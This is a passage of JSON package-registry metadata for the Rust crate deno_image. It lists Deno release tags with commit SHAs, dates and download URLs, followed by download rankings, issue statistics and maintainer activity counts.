z/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-09-08T09:35:11.879Z","dependent_packages_count":0,"downloads":56738,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":93.04212554579362,"dependent_repos_count":18.162332726404923,"dependent_packages_count":24.016687585073097,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":45.07371528575721},"purl":"pkg:cargo/deno_image","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_image","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_image","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_image/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-09-07T13:25:49.747Z","issues_count":6659,"pull_requests_count":9671,"avg_time_to_close_issue":17134708.21400472,"avg_time_to_close_pull_request":1530358.8397069778,"issues_closed_count":3811,"pull_requests_closed_count":8053,"pull_request_authors_count":591,"issue_authors_count":2494,"avg_comments_per_issue":2.5029283676227663,"avg_comments_per_pull_request":0.7209182090786889,"merged_pull_requests_count":7031,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":681,"past_year_pull_requests_count":1194,"past_year_avg_time_to_close_issue":1348806.688034188,"past_year_avg_time_to_close_pull_request":1303670.810240964,"past_year_issues_closed_count":234,"past_year_pull_requests_closed_count":664,"past_year_pull_request_authors_count":193,"past_year_issue_authors_count":377,"past_year_avg_comments_per_issue":1.234948604992658,"past_year_avg_comments_per_pull_request":1.134003350083752,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":2,"past_year_merged_pull_requests_count":497,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1803,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1731,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":285,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":268,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":149,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":396,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":183,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"crowlKats","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"devsnek","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_image/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_image/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_image/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_image/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_image/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_image/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek 